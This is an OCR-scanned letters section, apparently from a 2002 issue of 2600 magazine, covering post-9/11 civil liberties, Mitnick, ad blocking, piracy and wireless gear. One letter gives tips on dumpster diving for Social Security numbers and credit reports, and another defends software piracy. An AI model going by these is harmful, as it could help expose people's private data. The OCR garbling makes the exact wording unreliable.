"Middle School" on an envelope really isn't that 
unusual either. 

We re not faulting you for having this thought 
process. What we're doing is asking van to examine it 
and try and understand why these simple ait ions 
could somehow plant the seeds of suspicion in your 
mind . Then imagine the entire country thinking along 
the same line. 

The fact is you will not know if someone is up to 
something evil unless you know them very well or are 
highly trained in spotting such activity , Their are a 
few lucky exceptions to this but they tend to involve 
rather large dues , none of which were apparent here. 

You can rest assured that y ou didn 't do anything to 
make you a bad person. 

Dear 2600: 

So why ooi pul the army of 2600 to good use? 
Have you seen sites like www.jehad.net? They bla- 
tantly advocate the killing of American civilians and 
praise the September 1 1 th attacks as acts of God. Why 
not point the readership to a couple of these websites 
and let thorn practice their skills? 

Surf gods 

Skills? You mean like getting Linux to run prop- 
erly or installing secure encryption ? Or perhaps by 
skills you mean something destructive which is appar- 
ently when you think the hinder world exists for. You 
have to realize that the Internet represents the entire 
world, not just the United States. And that means all 
kinds of philosophies - some of which may seem ab- 
horrent - are represented Destruction isn V the answer 
- you have an opportunity to see something firsthand 
and accept or reject it fat your own reasons - as an in- 
dividual You don h need some group acting on your 
be hid for telling you what to think. How would it be if 
in real life a group of fellow citizens went around de- 
stroying people because they didn't like what they 
were saying about us or because of major differences 
in philosophy? 

OK. that was a real bad example.... 

Dear 2600: 

We must never forget dial die attacks of Septem- 
ber 1 1th were above all else an attack on the American 
way of life and all that el stands for Our Constitution 
protects us from abuses of power by our government, 
the very abuses that are so common by the govern- 
ments of countries like Iraq which back terrorism. If 


we allow our government to take away any of these 
freedoms* then ihe terrorism will have won a great 
victory. 

In Washington it is sad to see that many politicians 
who claim to support small and limited government 
have worked to extend government power to such a 
huge extent. The few voices of dissent have been for 
the most part drowned oul At the same time though, it 
has made for odd alliances. For example, some right- 
wing Republicans and liberal groups like the ACLU 
have found common ground in opposition to new 
government powers. 1 lie only way for us to light this 
extension of government authority is to find people 
who think likewise in all parlies, in all organizations, 
and join together to send a message to our govern- 
ment dial we must not let the terrorists win by altering 
our way of life. 

LordKhamul 

He careful not to fall into the propaganda pit re- 
garding who is evil and who is not. There are many 
countries with as bad or worse human rights records 
as Iraq who our government supports. We certainly 
don ( want to defend their despotic regime hut no de- 
finitive proof has ever been presented linking them to 
the attacks nor have they been caught acting aggres- 
sively outside their borders or planning to since the 
Gulf Wan Something else seems to be at work in our 
latest drive against them. 

Not that its any comfort at alt. but terrorist acts 
against our people have probably got nothing to do 
with our imy of life and every thing to do with what 
our government is doing in our name in other coun- 
tries . 77i£j; makes it especially important to know ex- 
actly what that is and to know where we as individuals 
slant!. We also have to keep our eyes open for those 
right here at home who oppose the American way 
not those who dissent, speak their minds, or represent 
something different. The real enemies are the ones 
who are t lying to change the rules and wipe away any 
Semblance of due process that hasn't already been de- 
stroyed - ali in the name of their twisted definition of 
patriotism. As you've pointed out , fighting this goes 
across all party lines and requires only intelligence 
and open minds. 

Dear 2600: 

1 was just reading your newest issue (1 9:3) and in 
your intro {"Freedom's Biggest Enemy*) something 
caught my eye. Ope rad on TIPS (Terrorist Informa- 
tion and Protection System i which proposes having 
members of the general public spy on people they 
come in contact with, looking for anyone or anything 
out of the ordinary.” 

Well. I'm no history buff but this really sounds ex- 
actly like the same thing that Hitler did. I remember 
reading a book land 1 can t remember which) where 
[he kids would even turn in their parents for doing 
something kind of suspicious. And fm honestly won- 
dering. and have been wondering for a while, if this is 
the direction our country is heading in. Haven't we 
learned from history? 1 would like to think so, but 
somehow I can't seem to convince myself we did. 

Oh, but it’s not like this hasn't happened before. 
Ever heard of McCarthy ism? It all started with Sena- 
tor McCarthy who had a list of known ' commies 


working for the government. Their lives got de- 
ployed, He asked people to turn in anyone they 
thought was a commie, The only way oul of it once 
you got called in was to name other people. If you 
didn't name other people, then you were a commie 
too. | Doesn’t this kind of stuff just piss you off on how 
dumb people are?) 

Hells-own 

One thing that always happens during these dark 
periods is the emergence of collaborators who go 
along with such things and individuals who stand up 
and fight them. One thing we can almost guarantee is 
that you'll he very surprised who winds up in each 
camp l 

Deyr 2600: 

Just wanted to let you know - your bright light is 
soon to he extinguished. One more major terrorist at- 
tack and your land your type s) relevance will cease, 
your moment will have passed. This is the price you 
will pay lor your arrogance and ignorance of human 
nature and history. Thinking any societal structures 
are infinitely perfectible - what dreadful nonsense. 
Don't blame anyone else (da mm) for loss of civil lib- 
erties - look at da man in da mirror. When security and 
law and order are recklessly neglected and chaos and 
uncertainty threaten, the balance of societal priorities 
shifts. To quote Aragorn; "Are you scared 7 You're not 
scared enough.” Better get used to your nightmares, 
they ain't going away anytime sewn. Enjoy the dark- 
ness, 

R$ 1 hear BuSpar is good. 

KrOOIee-O 

It may be a paranoid reaction hut sometimes we 
get the distinct feeling that there are people out there 
who don't like us. 

Dumpster Diving 

Dear 2600: 

In response to your article on dumpster diving, in 
the UK a (creepy) chap called Benjamin Pell did this 
for a living, feeding info to the press and is estimated 
to have made over one million pounds from it. Test 
cases in the UK have decided that even though trash 
has been thrown away, it still belongs to the thrower, 
and is not "public domain." Funny old world. 

Paddy 

Dear 2600: 

Just thought I'd add to Gri Tier's brilliant article in 
19:2 about dumpster diving. Another great place to 
dive is behind small insurance sales businesses. No 
locks, no shreds, and especially, no food, I've found 
stacks (big slacks) of personal info like addresses, 
phone numbers, socials, credit reports, etc. Grifler 
brought up a nifty idea with the cardboard boxes as an 
excuse. Thai tidbit would have gotten me out of a tew 
jams when I found running to be very necessary. Ap- 
parently backpacks aren't a good idea either Happy 
diving! 

Nomad 

Dear 2606: 

Great article on Dumpster Diving by Grifter in 
19:2, Others who are interested can join fellow divers 


in the all.dumpster newsgroup in Usenet for all soils 
of discussion, etc. There's a lot to learn and we share 
information with all. No flames or trails, please. 

Slinky 

As if merely asking made the fames and fad Is gt> 
away. 

Feedback I 

Dear 2606: 

I have been following the topic of right click sup- 
pression in your magazine for the last couple of issues 
and decided to put my Two cents in, I am a photogra- 
pher and on my website, my gallery images have right 
click suppression on them. The reason for [his is 
rather interesting. J feel that if you really appreciate an 
image that I have and want to have a copy of it. you 
should cither contact me or, even better, find a way to 
work for it. This ss one of the basic parts to hacking in 
my book, finding rew r ways of learning. It is not 
harmful or destructive, and if you find a wav around 
something, than you have learned something new. 
Props to you, and keep up the good work. 

Traveler 

Dear 2606: 

In response to Erovfs comment about script kid- 
dies and the ratio of master to newbies: 

The way our world is now is fine when it comes to 
the script kiddies and the masters ratio. Both have dif- 
ferent goals. The masters' goal is to expand their abil- 
ities and show off hy creating the program. 
Recognition for the program is among peers, not by 
the ignorant majority shat is clueless to the true art of 
anything they do. Masters are happy how they are. 
programming. 

Script kiddies find joy in just breaking into school 
computers and by petty acts of malice that bring 
recognition by the ignorant masses. That makes the 
script kiddies happy. 

As long as everyone is happy, what's ihe problem? 

XiChimos 

We weren't aware that everyone was so happy. 
Perhaps we could join in a chorus of Ode To Joy if the 
people committing "petty acts of malice " stopped call- 
ing diem selves hackers to the ignorant masses . 

Dear 2600: 

I just finished watching Freedom Downtime two 
minutes ago. I finally got around to ordering it and as 
soon as I got home and saw that package in my mail 1 
opened it up and popped it in ihe VCR, I just want to 
say I thought it was great, I especially enjoyed the Mi- 
ramax protest and your across the count ry trip to gel 
the word out about Kevin I plan on making copies 
and giving them to my friends; 1 also hope to have a 
showing at my school. Thanks for taking the lime to 
make such a great film and keep up the good work. 

joe 

Dear 2600: 

l just read the article in 1 9:2 about doubleclick. net 
and how evil it is, as w^dl as the letter with a solution 
involving iplables. This is all fine and dandy, but h 
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definitely looks like killing a dog with a cruise mis- 
sile. The first thing [did was start up Moz.il la and see 
what it had in its preferences, and I saw that nut only 
does Mo/.db have reasonably flexible coolde block- 
ing stuff, it has image blocking stuff as well. Here's 
the easy two-step process that doesn't require firewall 
software or root access {a definite selling feature on 
those lovely university unix labs): 

L) Change your cookie setup. Only accept them 
from the originating web sire and lell it to ask before 
storing a cookie. Mozilla can remember your decision 
about cookies, so the dumb popups are a one-tune 
affair fur sites you visit regularly. 

2.) Find a site with doubledick.net ads. 1 googled 
for ' funny puppies " and won on tny first try: block 
images from this site" on the ad ( right dick, duhl, I'm 
moderately annoyed that dicy didn’t let you add sites 
to block images from in the preferences menu, but 
you can't win them all, I guess, 

1 don't know what they manage to squeak by wulh 
javascript, but Mozilla lets you disable javascript's ac- 
cess to cookie data, its ability to make cookies, 
change images, and so forth, so it can probably be 
mostly curbed. The preferable solution would be to 
ignore javascript and images based on a configurable 
list of keywords. 

Opera lias similar features, but I don't think they’re 
as Complex. IE's approach to this seems to be along 
the lines of telling the user, ’'don't try to hide from my 
money grubbing masters or I will crash your 
computer" I haven’t checked konqueror yet. 

Bob M. 

Dear 2600; 

This is a response to a letter written by que! in 
19:2 which suggests blocking web ad images by 
adding each image server IP to Linux net filter rule ta- 
bles, ['here are several much easier ways to block ads, 
such as: 

L) Add the server's name and the address 
1 27.0.0. 1 to your /etc/hosts fife. (Windows has a hosts 
file too at C:\windowsMiosts or C:\wmnt\system32\div 
ven5\etc\hosts.) 

2.) Use a browser (such as Mozilla) or browser 
plugin that can give you better control over the im- 
ages that the browser downloads and displays. 

3.1 Most importantly, try out a personal web proxy 
such as Privoxy. Adzapper, Web Washer, or 
Guide .scope. If you haven't heard of any of these, 
Google is your friend. 

Eil 

Dear 2600: 

Thanks for publishing so much discussion of the 
gun control issue. Despite the fact it is not directly 
connected to hacking or freedom of information, your 
readers seem to be very interested in it. I’m a new 
reader who picked up a bunch of back issues at H2K2. 
and I've been following the debate backwards to 18:3, 
I'm sorry you don't support the right to bear arms the 
way, say T American Rifleman (the main NR A maga- 
zine) supports f reedom of information. 

1 would like to point out a nonsense statement: If 
only hackers were treated as well as gun owners in the 
United States!" Violation of (he DMCA of 1998 car- 


ries a penalty of up to five years in prison for a first of- 
fense. Violation of the NFA of 1934 (for example 
owning what the DoD calls an assault rifle, sawing off 
a shotgun, or making your own gun of any kind) car- 
ries a penalty of up to 10 years in prison. I also feel 
(although this is more subjective! that the plethora or 
laws governing firearms ownership are more onerous; 
I've never been fingerprinted in order to buy a packet 
sniffer, or had to appear in person at the sheriffs office 
lor a license to carry a password hash cracker. I do not 
risk live years imprisonment for forgetting to dear 
some software oft my laptop when 1 go to visit my 
parents in New Jersey; if [ accidentally leave any 
standard hunting ammo in my car, 1 risk (hat, 

Charles 

if you an like an idiot with deadly weapons, you 
should he prevented from continuing to do so. It's 
amazing how many people sec that as a violation of 
their rights yet will blindly support idiocy like the Pa- 
triot Ait without a second thought* What we don 't sup- 
port is the attitude that anyone who suggests any form 
of regulation of firearms is somehow advocating dis- 
arming the populate, no dtmht in furtherance of some 
hidden agenda, ft's an hysterical reaction that only 
manages to demonstrate how had the problem is . 
There are ail kinds of legitimate reasons to own guns. 
But. being deadly weapons, they cannot conflict with 
the needs of society. That's why we frown upon walk- 
ing around schools and churches with firearms, re- 
gardless of what you think the Constitution says you 
can do. It's why deranged individuals rend to he dis- 
couraged from becoming gun hobbyists. These direc- 
tives ore coming from the people, not from some 
invading go verrm tent. 

If we can get major politicians clamoring for the 
rights of hackers and the "National Hacker Associa- 
tion'' challenging the government to pry our key- 
boards * from our cold ' dead hands " then maybe 
hackers will have a chance of being treated better 
than gun owners , Until that day, it's an absurd 
comparison . 

Dear ^Aft- 

Regarding the cover of 19:2. 1 was wondering it 
that "building" that kinda looks like the U N. is actu- 
ally an integrated circuit that I've seen in some touch- 
tone phones from the 70s and 80s, and the nound 
"building - ' being a receiver or speaker of some sort Is 
that right' 1 S noticed because die "hu tiding" is not fac- 
ing die same direction as any of (he others, Nicely 
done! Thanks for your magazine - love every minute I 
read it. 

ShadowfaxO 

You're -very observant. But we really don 't deserve 
the credit this time The round building is actually 
Madison Square Garden with the surrounding ones 
being part of the Pennsylvania Station complex in 
Manhattan. Across the street (in the middle of tin 
cover) is the Hotel Pennsylvania which is where tin. 
HOPE conferences are held . A trained eye can see the 
little bridge that hooks Two of the conference rooms 
on the top floor together. 

Dear 20Aft* 

1 am a 2600 subscriber. Recently by chance I 
viewed Freedom Downtime on Free Speech I V 
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tFS rV) and was amazed to learn about the details of 
Mr. Ke vin Mitnick. The reason for my letter is to basi- 
i ally express my opinion on the case. 

First of all. where is the American Civil Liberties 
Union? H a ve \ he y i gnore d M n M i tnick ' s e ase ? Tl us is 
Lie finitely a case for the ACLU. 

Needless to say what Mr, Mitnick had to endure 
w as unnecessary and illegal, l feel that the film should 
have concentrated a lot more on die constitutional is- 
sues and made it clear that one of our inalienable 
rights given to everyone Living in the United States of 
America by the U S. Constitution (the supreme law of 
the land] is the right to a speedy trial. 

VVhat f fill! to understand and what the film does 
not fully explore is how any jurisdiction was able to 
keep a man incarcerated lor such a long time without 
a I rial. The film leads me to believe that Mr, Mitnick 
was deprived of his freedom until he acquiesced lo a 
guilty plea. Is this (he case? Was the government 
holding him hostage in exchange for a guilty plea? 

Should (his be (he case, then the entire movement 
and Mr. Mitnick should tile suit against ail parties in- 
volved in the unlawful detention, and the civil liber- 
ties and constitutional abuses toward Mr. Mb nick. 
The film concentrated heavily on what Mr, Miinick 
did not do. on the lies various writers were writing 
about, on the hacker community, and Mr. Mimick's 
detention without a trial? But I believe it failed to 
drive the nail down to the core by not mentioning the 
constitutional erosion his case represented and (he 
danger of his situation for the sake of all Americans. 

Please do not get me wrong, \ respect all of the 
hard work that went into the film and the movement 
.is a whole, I am just offering a perspective which I 
believe would gel a stronger response from the legal 
and politicaJ community. I would not w r ant to think 
that all of the hard work of the civil liberties move- 
mem of (he 1 960s or (he injustices and (he suffering of 
those who then fought very hard to keep (he integrity 
of the U S. Constitution and (he Bill of Rights were 
suddenly fuTgnlten when Mr Miinick was denied his 
freedom, placed into solitary confinement for eight 
months, and left incarcerated lor about four years 
without due process! 

Any state representative, Senator, or Congress- 
man should hear Mr. Mitnick's story and all parties in- 
volved in this abusive behavior should be prosecuted, 
! his is of paramount importance. Perhaps I am naive 
i rid 1 have loo much faith in our Constitution and 1 
cannot begin to imagine how these abuses could have 
been so blatantly executed by the authorities. 

Any competent constitutional lawyer should have 
been able to have him released. It is very very difficult 
I nr me to believe the events as they were explained in 
the film. I greatly respeci (he effort, time, and energy 
that went behind (he scene and (he entire Free Kevin 
network. However I cannot understand why one of the 
unwl powerful weapons and protection {(he U.S, Con- 
ditulion) was never mentioned in the film. 

Mr Mitnick's lihcrty as well as all of our liberties 
i iv at great risk. His case should not be forgotten and 
h 3 rev Kevin movement should evolve to the next 
U vc I. A level of awareness, education, and realization 
here his case should be made known on legal fourt- 
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dations and the indisputable truths should he ad- 
dressed Eind examined by professionals as well as po- 
litical representatives of the people (there are still 
some honest ones out there). A level where die legal 
system should take slops to correct itself and publicly 
admonish those who were involved in this case Oth- 
erwise we are all in great trouble. 

1 conclude where ] started. Where is the ACLU? 

hawk 20041 

AH of the questions you asked are ones that we 
also struggled with thtvughout the making of the film, 
IPs frustrating not to get clear and definitive answers , 
And we wish it were that easy to actually get justice 
offer demanding it. For now. we 7/ have to settle for 
trying to educate the masses. Phase help spread the 
word and maybe you'll manage to get some sort of re- 
spot i sc from th ose responsible. 

Dear 2600: 

1 have to commend Kevin Mitnick and William 
Simon for their amazing book: The .Art of Deception. 
We have begun living tn an era of secrecy and of sus- 
picion, and still the weakest factor in any situation re- 
mains the human element. It's hard to give this book 
just praise without sounding like an advertisement. 
Amazing work, Kevin, simply amazing. 

Poetics 

Dear 2600: 

I’ve picked up your last four issues and have found 
myself sincerely enjoying them because of your lack 
of bias. In journalism it's difficult to separate your per- 
sonal feelings toward a subject from the writing you 
do on it, and 2600 is mainly focused on topics people 
feel strongly about. But what makes your publication 
superior, or unique in any case, is that you usually 
can't be caught puitiug down other people's views or 
campaigning your own. I t s the mark of a well (bought 
out organization of articles that allows your quarterly 
to maintain a calm composure during days of civil un- 
rest.,. days that wont end while we are alive simply 
because (he public remains apathetic while power- 
hungry fat cats grow fatter. I’m not going to the ex- 
treme here - insurrection is only necessary when we 
agree it s necessary, bu! readers and writers of your 
publication seem to be of the intelligent group that un- 
derstands their rights and won’t give them up without 
a struggle. 

Nietzsche 

Thanks for the kind words but we are most defi- 
nitely biased, ft's really impossible not to he. espe- 
cially with this kind of subject mutter. What's most 
important, as you point out, is to respect other opin- 
ions . , Otherwise, there's little chance of a meaningful 
dialogue. 

Dear 2600: 

What's up with publishing an outdated article on 
shopping cart flaw s ( 19:3)7 The flaw that Mr. Moore 
discusses has been around for as long as I can remem- 
ber and has been fixed, for the most part, by shopping 
can authors that are worth anything. As a former site 
designer/ tret work admin 1 ran into iliis problem with 
some shopping cart software way back in 1998. \ con- 
tacted the author and the problem was patched up 
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within days. I r m wondering if Mr. Moore has in- 
formed i lie company in die article about their prob- 
lem? If not, as an ethical "hacker." I think that would 
be the honorable thing to do. Our job is to help people 
team from their mistakes, not punish them for k, r 

JaMmSr 

We exist to report on discoveries and findings. 
Anything beyond that , good or had. is extracurricular, 
A s for this article, vou seem to be against its being 
printed regardless of whether or not it w.v outdated. 
If ai! of the hugs were fixed before we printed them t 
(hen we would indeed he printing outdated info and 
getting more complaints like yours , Hut non -outdated 
info leads to implications { like yours) that we’re pun ■ 
i siting people and not being ethical. It seems we van’t 
win. 

Dear 2600; 

Thank you for your reply to my letter regarding 
people's saved email tiles being shared on Kazaa, 
While I don't agree that reading other people’s email 
which they are sharing is clearly an invasion of pri- 
vacy" in the same way that reading private mail my 
neighbor posts on a billboard on his front lawn would- 
n't be. 1 respect your opinion on the matter. Also, I 
should have added that it's always best to email those 
round affected and Jet them know they're sharing the 
wrong stuff. l r vc gotten both thanked and threatened 
in response to that, which is nice. 

Rob T. Firefly 

We didn't mean to unply that the privacy invasion 
was your fault. And what you did certainly isn’t a 
crime , But those who go around using other people s 
stupidity to invade their privacy are still invading 
their privacy, albeit in a passive way much like listen- 
ing in on private phone rails broadcast in the clear 
By letting the world know you performed a valuable 
service. 

Dear 2600: 

This is in response to HJH's article Pf A Nasty NT 
Bug" in J9;2. I'm happy lo ssy that the bug reported in 
the ankle has been patched. Whereas 1 an unsure 
when Win 2000 was patched f Win XP was fixed by 
$T>I. Also, the current Beta of Win NET is com- 
pletely immune from this hug. I guess it just goes to 
show, when 2600 talks, Microsoft listens. Good show, 
and keep up the good work. 

Jason Argonaut 

It's quite possible this was reported in some other 
way but thanks for the good thoughts. 

Dear 2600: 

I agree w ith the philosophies of your magazine on 
one level- I've also noticed it is easy to get caught up 
in. And sometimes I find myself agreeing w ith what 
you advocate and other limes questioning it, While I 
love the info, 1 have to question it. If we never ques- 
tioned. we would all be sheep. While 2600 is defi- 
nitely an authority in the hacking world (or 
underworld if that is easier to swallow k I urge the 
readers lo mill over and ultimately question what they 
read. Because even if they are fellow hackers, you 
don't have to agree with them or their ideals. And as 


idealistic and good-sounding as 2600 is, that doesn't 
make it 100 percent correct. I'm not accusing 2600 of 
anything. I'm just saying that you should question 
everything to make sure it works lor you. Being 
spoon-fed by other hackers is the last tiling we need. 
Question This. Question Life. Question Star Trek. But 
more importantly. Question Everything. 

Resurrect ion 20 

We couldn’t agree more . Unquestionably, 

Injustice Department 

Dear 2600: 

While you may feel like this letter is an attempt at 
someone using you as a soapbox to rant ahout repres- 
sion of their right of free speech, it is actually my ac- 
knowledging some intriguing similarities between 
your lawsuits and my job (if that makes any sense). 

I work at an adult video/loy store in California in a 
town of less than 10,000, although we serve approxi- 
mately 100,000+ clientele from all over the area. Due 
to recent events, our store will be forced to shut its 
doors forever due to ignorance and hatred aimed at us, 
simply because we are looked down upon by our local 
government and several religious circles. In more de- 
tail. the town government instated a law that prohibits 
any adult related shops from conducting business 
within 20(H) feet of a school and 1 500 feet from any 
church. This is ironic because we are two blocks away 
from an elementary school and four blocks away from 
our local Presbyterian church, and the bw was 
instated two years after we had opened! 

Anyway, our store has always obeyed the strict 
laws that the state regulates our industry by, and we 
have always been in cooperation with these as well as 
any city ordinances, wutli exception to the one stated 
because of obvious reasons. We have been in constant 
court battles, won every single appeal, and still our lo- 
cal government has us in their crosshairs. 

The clincher here is a recent overnight arson at- 
tempt on our store which did approximately $45,000 
in damage and also ruined our already tarnished im- 
age w r hen the newspapers printed the city's response 
to it: "That is the kind of people that ****** Video 
World attracts, h is their own fault tor bringing 
lowlife trader trash mu> the city, and they get no sym- 
pathy from us." That is directly out of our local 
newspaper 

The store owner decided u> shut down in October, 

l now have to take two jobs to match the salary l 
was making in order to keep rent and afford tuition. 
My insurance has already been canceled and l have to 
pay $95 every other week for a bottle of insulin so E 
can live. Yet the most hurtful thing of all is that I have 
lost dose friends, some family members have turned 
their backs on me, and I have even been refused ser- 
vice at a local grocery store because the owner knows 
where I work! 

And why exactly? Religiously influenced and bi- 
ased government taking a stranglehold on a privately 
owned adult shop simply because they decided to 
conduct business. Not because they did anything 
wrong, hut simply because it existed and certain 
people didn’t want it to. 


2600 Magazine 


All the best with your endeavors. Thanks for 
it I ling like it is instead of how they want us to think it 
is. 

deejayredlOO II 

We have no doubt (hut some of our readers will 
disagree but we find the above treatment all too com- 
mon and symptomatic of some serious problems in 
our culture. Unless you were soliciting customers 
from the elementary school or leaving brochures in 
the pews of the church, you should have been treated 
as any other member of the community. This kind of 
coexistence happens in other countries all the time 
n ithout any adverse effects. We, on the other hand, 
stent to he moving ever closer to a fundamentalist 
hell. 

Dear 2600: 

Thought 1 would tell you guys about my web host 
and how they have annoyed me. They were line for 
about half a year, then suddenly a few days ago my 
site disappeared. All the files have been deleted and 
ill that is visible is a placeholder I have been locked 
■ tut of the admin interface, too. What annoys me is 
that I had no warning, no explanation, and no chance 
of backup- It simply switched off. I have tried contact- 
ing them. They won't get back to me via email and 
their phone number doesn't work, ll is companies like 
these that really disappoint me. It's gotten harder to 
find decent, proper companies that don't treat 
customers as if they were meaningless. 

Mart 

There are a couple of lessons here. Always keep 
vrmr own backups . Never rely on people you don't re 
idly know to do anything except cash vour checks. 
\tul whenever possible, try to run your site yourself 
That way , the most you can lose due to someone else 7 
uu ornpetence, ill will, bankruptcy, etc. is a temporary 
loss of bandwidth. 

Dear 2600 : 

I work as a delivery driver here in North Carolina 
.md I usually gel home rather late, 1 live in a fairly 
small town (2,000 residents and 10,000 college kids) 
and my car is very easily identifiable by the numerous 
computer related stickers on the back of it. I was 
slopped by the law at a license check,., a fairly routine 
happening. They looked at my license and (hen asked 
me to pull off to the side - an officer would be with me 
shortly? 1 After waiting for ten minutes, the officer 
ho pul me aside asked me to step out of the car. Now 
i vmember, I am a delivery driver, and common sense 
would tell you that 1 have a valid driver's license and 
also that I would not be under the influence of any 
Ltbstance t perhaps caffeine?). So naturally, l was a hit 
puzzled by this. He then aske d me if he could search 
my car and of course I said (in a polite fashion), "No. 
you may not. I do not feel that [here is any reason for 
vou to search, and certainly no probable cause " Qh t 
but this officer found probable cause... there was a 
lack of 2600: The Hacker Quarterly in my back seal 
I uing from 1998 through 2002. He said that this was 
a "suspicious magazine 1 ' and he was baffled that I 
■a on Id even think to have such a thing in my posses- 
ion. I told him that I did not believe this was any rea- 
< m or cause to search my car* so he called one of his 
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hoys over. They told me that I was interfering with an 
officer's line of duly and that I could be thrown in jail 
for such behavior, t am not one to get thrown in jail 
(especially at the age of 18, still living with parents), 
SO / stepped aside. After a 30 minute search, they de- 
cided the car was line and there was uo reason to hold 
me any longer. They even had drug dogs there to sniff 
everything out.*. looking for that kilo of cocaine that 
every cop just JbfflH-s is in there somewhere. Needless 
to say. I think that this is a perfect example of what the 
media has done to "hackers" and the image they have 
drawn of us. I would love to press charges, hut being 
an 18 year old entering college, I simply don't have 
die funds. 

Evnglion 

You acted entirely properly by questioning them, 
keeping your cool , knowing when to hack down , and 
letting the world know what happened. Unfortunately 
this kind of thing will continue to happen. It s always 
a goud idea to get as much information as possible 
from the scene ear number , ; bculge number, names, 
etc. in the event that you decide to pursue matters 
later Most people choose rtof to and we completely 
understand why* 

Dear 2600: 

First off, great magazine - you've managed to in- 
form the hacker world of many new laws, news, ideas 
that otherwise we wouldn't experience through main- 
stream media, I had closely followed your trouble 
over the domain fuckgeiieralmotors.com Upon hear- 
ing this* l too was outraged that because a big corpo- 
ration saw' some offense to this* they should go strip 
away a component to our First Amendment. So in 
support of your effort, I registered www.generalmo- 
LorssLicks.cjb.net. I successfully maintained the site 
w'hich I Linked to ford.com. But not too long ago. I 
found that my page had been shut down without no- 
tice. my password to my account was invalid, and I 
have had no contact from any .cjb rep I am consider- 
ing filing a law-suit or at least notifying the public of 
this so they can also voice their concern. Any 
thought/ word would he appreciated, 

ini .source 

Since you re using this company's name, they have 
the ability to simply disconnect you (although they 
seem rather immature for doing it the way they did). If 
you want to make any kind of statement using a do- 
main name, you should register the entire domain 
name under .com, .net, etc. and then find service 
through the provider of your choice. If they shut that 
ojf r it’s a much bigger issue. 

Dear 2600: 

i was in Wal-Mart in Hammond, Indiana the other 
day - the day the Spider-Mart DVD and VHS came 
out. So J figured I'd go pick up a copy as long as 1 had 
the cash. So I walked over to electronics and stood in 
line. Note that l am 14 years old and I look more like 
16. I asked to huy the Spider-Man DVD (they had it 
behind ihe counter) and they said You have to be 17 
or older with ID to be able to buy this movie." Now 
ihe movie is freaking rated PG-I3 and to lop it off 
they had the VHS sluing right on shelves near the 
cash registers outside electronics and by music m 
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electronics. Why in the hell would [hey card me for 
Spider-Man ? Just another case of morons power 
abusing. 

Dime Tanaka 

Definitely moronic behavior, if you re not in she 
mood for a confrontation with the store manager, we 
suggest writing o polite hut firm letter to She main 
headquarters telling them of your unpleasant experi- 
ence. Oftentimes this leads to some sort of resolution. 

Dear 2600: 

l gave a speech today at PM 1 and started by show- 
ing people how easy it is to get on wireless lief works 
even those that are encrypted. I'm scuta nervous now 
that I'll be hauled away in a black van tonight. J just 
fell the need to write something in case I'm never 
heard from again! 

It's a shame tit at we must live fearing that our aca- 
demic works will come back to haunt us. 

(1 also plugged 2600 during the speech.) 

Todd 

That's right, drag us dow n with you . 

Thoughts On Piracy 

Dear 26m: 

1 am an avid software pirate. Much of the software 
that I use is pirated because 1 am one poor bastard. 
However, being a software developer myself, 1 realize 
the importance of getting what is due for your hard 
work Wail a minute? Huh? How can I develop soft- 
ware and condone piracy? I lene s my thinking on the 
matter. First of ali, when I benefit in any way other 
than purely educational, 1 make a point ol purchasing 
a full copy of whatever program I'm using, i had a pi- 
rated version of Dreamweaver for quite awhile. When 
I finally started posting real web pages developed in it 
1 purchased the full version \ Version 3. hut that's good 
enough for me right now). I also have a pirated copy 
of 3D Studio Max that I've had for years. The version 
L have is old. but I have fun with a L Will I ever use it in 
a professional sense 1 No, Should t pay massive 
amounts of money to use something that l just fart 
around with on occasion? I don't think so! Does Lhe 
developer lose out because I didn't pay for my copy? 
Lefs pul it this way.,, if I were forced to decide today 
between keeping it and paying the money, or giving it 
up. it‘d be no contest. I'd give it up, 1 don't need it that 
bad. I'd never used it in a way to justify the price. So 
what does the developer lose? Money that they'd 
never have anyway if their program were completely 
pirate proof? If the day comes, and I doubt it will, 
when I use what 1 create in IDS Max for something 
more than idle fun, HI pay for it. Until then, t see no 
loss by anyone. 1 hope others use the software I create 
in the same manner 

II269U 

Questions 

Dear 2600: 

Does your magazine have any competition in it', 
class? I'm sure you know many magazines do have 
competitors, however I've never seen competition lo 


yours. I'm not trying to suggest anything negative 
about your magazine. !i may took as though I am. I 
just enjoy this, type of leading material and I gel 
through your magazines pretty quickly because of 
that, 

Super-Fly 

There are plenty oj Internet zines out there hut we 
haven 7 found any other paper publications that are 
devoted to the hacker world. Occasionally we see an 
abortive attempt. They usually don't succeed for a 
number of reasons - they try' to get too big too fast , 
they get spooked by the legal threats and hate mail, or 
they simply realize what a commitment if really is. Wtr 
need a good deal more zines covering this stuff nor 
just here hut all around the world. 

Dear 2606: 

I just read the article on 802.1 lb ( 19:2) and it told 
me 99 percent of everything 1 wanted to know about 
802.11b networks except for the one thing l really 
wanted to know. In the article it said they used a 
' magmount antenna on the roof " How do i hook this 
up to the card - or does the card just use (he antenna 
through osmoses? I would love to scan the surround- 
ing area, but need signal strength. 

In a TrAnCe 

Many 802.11 cards have antenna jacks an them 
but for those that don't you're pretty much out of tuct 
Yon may want to ask google about your card and an- 
tenna jack" to see if there is a way you might add one. 
but its gem- rails not a reliable hookup. Even so. 
you’ll almost certainly need an adapter ( commonly 
called a pigtail") to go from your antenna s jack 
(probably an " N " jade look for pictures) to your 
card s jack (probably SMA ), 

Dear 2606: 

I was wondering why there is something strange 
on page 33 at the bottom of the page where it should 
say "Page 33?" Each time there is something different 
but it is never correct. 

QuielSIuidow 

We get more mail on this than on an\ other subject 
by far. And yet, everyone who writes in seems to knttw 
what page number they’re talking about even though 
they claim the page number information is faulty! It 
defies all togas 

Dea r 2600: 

f have a folder on my computer that 1 cannot open 
or manipulate in any way. It is Located in my CA drive 
and when 1 double-click it. an error message pops up 
that says ' This folder docs not exist. " Can you tell me 
what has happened 1 

Phule_2k2 

Your problem appears to he that you’re running 
Windows. Other than that, this is one we weren't able 
to find an immediate answer for. Well let you know 
what we find. 

Dear 2600: 

I was wondering if you could please tell me who 
is the man on the right side of cover 19:3 Also if you 
could please enlighten me as to what 'might'' be on 
the disk and roll of film. Keep up ihe gtn>d fight - bo! 


cause of you the ideals and principles of many have 
been changed. 

Quiet Riot 

Answering these questions would undoubtedly 
lead to more questions and the need for more an swers 
and a possible Semite inquiry: Let’s just say it's a 
pretty picture and leave it at that. 

Dear 2660: 

Maybe 1 have something wrong or have misunder- 
stood H R, 54b9, Why are radio stations that broad- 
east an EM signal to my car allowed to continue to 
simulcast over the Internet with no proposed legisla- 
tion against them? Why have the Internet radio sta- 
tions been singled out? Did \ miss something? 

ddShelby 

Any Interne? broadcast is affected in some way. 
Broadcast stations are no exception. But it sen es to 
prove the absurdity of the legislation as broadcast sta- 
tions can have as many people listening to them over 
